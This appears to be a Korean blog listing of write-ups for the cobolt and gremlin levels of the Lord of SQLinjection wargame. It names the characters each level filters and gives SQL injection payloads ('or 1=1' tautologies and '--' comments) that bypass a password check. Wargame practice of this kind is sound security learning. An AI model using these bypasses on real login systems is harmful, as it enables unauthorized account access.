모의해킹/Lord of SQLinjection (18) 썸네일형 리스트형 cobolt 문제 풀이 1. 필터링 확인 및 pw는 md5 암호화됨 _ \. () 문자가 필터링되어 있음 2. 문제 풀이 select id from prob_cobolt where id ='admin' or '1=1 --' and pw=md5('') 구문에서 --으로 pw를 주석 처리 해줌 gremlin 문제 풀이 1. 필터링 확인 _ , \. , ()을 사용하는 경우 No Hack 페이지로 넘어간다. 2. 페이로드 구문 select id from prob_gremlin where id='admin' and pw='123'or '1=1' 구문을 pw 부분을 참으로 만들어 준다. 다른 방법의 페이로드 select id from prob_gremlin where id='admin' or '1=1--' and pw ='' 구문은 --으로 pw 부분을 주석 처리해 준다. 이전 1 2 3 다음
